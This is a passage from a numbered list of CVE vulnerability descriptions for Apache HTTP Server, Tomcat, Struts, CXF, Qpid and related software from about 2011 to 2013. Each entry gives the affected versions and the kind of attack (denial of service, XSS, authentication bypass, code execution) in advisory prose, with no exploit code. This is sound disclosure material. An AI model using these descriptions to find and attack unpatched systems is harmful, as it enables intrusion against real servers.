4736| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
4737| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
4738| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
4739| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
4740| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
4741| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
4742| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
4743| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
4744| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
4745| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
4746| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
4747| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
4748| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
4749| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
4750| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
4751| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
4752| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
4753| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
4754| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
4755| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
4756| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
4757| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4758| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4759| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4760| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
4761| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
4762| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
4763| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
4764| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
4765| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
4766| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
4767| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
4768| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
4769| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
4770| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
4771| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
4772| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
4773| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
4774| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
4775| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
4776| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
4777| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
4778| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
4779| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
4780| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
4781| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
4782| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
4783| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
4784| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
4785| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
4786| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
4787| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
4788| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
4789| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
4790| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
4791| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
4792| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
4793| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
4794| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
4795| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
4796| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
4797| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
4798| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
4799| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
4800| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
4801| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
4802| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
4803| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
4804| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
4805| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
4806| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
4807| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
4808| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
4809| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
4810| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
4811| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
4812| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
4813| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
4814| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
4815| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
4816| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
4817| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
4818| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
4819| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
4820| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
4821| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
4822| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
4823| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
4824| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
4825| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
4826| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
4827| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
4828| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
4829| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
4830| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
4831| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
4832| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
4833| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
4834| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
4835| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
4836| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
4837| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
4838| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
4839| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
4840| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
4841| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
4842| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
4843| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
4844| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
4845| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
4846| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
4847| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
4848| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
4849| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
4850| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
4851| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
4852| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
4853| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
4854| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
4855| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
